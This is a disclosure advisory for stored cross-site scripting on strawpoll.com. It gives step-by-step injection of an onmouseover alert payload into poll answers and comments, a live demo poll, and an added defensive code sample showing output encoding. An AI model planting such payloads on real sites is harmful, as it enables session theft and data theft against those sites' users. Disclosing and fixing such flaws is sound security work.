############################0xSilver############################
# Exploit Author: @Meshari-Almalki
# Exploit Title: Strawpoll - Cross Site Scripting (Stored)
# Vendor: strawpoll.com
# Date: 2020-10-18
# Software Version: *
# Software Link: N/A
# Google Dork: N/A
#############################################################
[*] Vuln Info:
==============
Cross-Site Scripting (XSS) is a vulnerability in which an attacker places malicious client-side code onto a web page.
Attackers use XSS vulnerabilities to steal user data, control user sessions, run malicious code, or even as a major component of phishing scams.
#############################################################
[*] Vuln PoC:
====================
[1] - Go to strawpoll.com
[2] - Sign in and create a new poll
[3] - Fill Answer Options with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a>
[4] - The payload now appears at the top of the poll and executes when you mouse over it.
=============================================================
[*] Another Exploit:
[-] After creating a poll, or when visiting another user's poll,
[-] go to the comments and send a comment with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a>
[-] go to your comment after sending it and click delete, then mouse over it; the payload will execute
#############################################################
[*] Demo:
=========
https://strawpoll.com/sqvuggup3
<meta name="description" content="What's your opinion? Vote now: <a onmouseover="alert(document.domain)">0xSilver</a>, <a onmouseover="alert(document.domain)">0xSilver</a>" />
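The demo output above shows the answer text copied unencoded into a quoted attribute value. The following is an added example, not part of the original advisory and not strawpoll.com code: a constructed renderer (all function names are hypothetical) showing the unencoded pattern beside output encoding applied to the same payload, for both the meta attribute and the option text.

```javascript
// Added example: constructed rendering helpers, not strawpoll.com code.
// All function names below are hypothetical.

// Payload from the PoC above, used here as sample untrusted input.
const ANSWER = '<a onmouseover="alert(document.domain)">0xSilver</a>';

// Encode the five characters that can change HTML parsing context.
// Suitable for element content and for quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: user text concatenated into markup unchanged,
// which reproduces the broken <meta> tag shown in the demo.
function renderMetaUnsafe(answers) {
  return `<meta name="description" content="Vote now: ${answers.join(", ")}" />`;
}

// Hardened pattern: each answer is encoded at the point of output,
// so quotes cannot close the attribute and tags stay plain text.
function renderMetaSafe(answers) {
  return `<meta name="description" content="Vote now: ${answers.map(escapeHtml).join(", ")}" />`;
}

// Same encoding for the answer option (or comment) in the page body.
function renderOptionSafe(answer) {
  return `<li class="option">${escapeHtml(answer)}</li>`;
}

console.log(renderMetaUnsafe([ANSWER, ANSWER]));
console.log(renderMetaSafe([ANSWER, ANSWER]));
console.log(renderOptionSafe(ANSWER));
```

Encoding is applied when the value is written into HTML, not when it is stored, so the same stored answer or comment stays safe in every template that renders it.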
#############################################################
[*] Contact:
============
# Telegram: t.me/x0Saudi
# Twitter: twitter.com/slv0d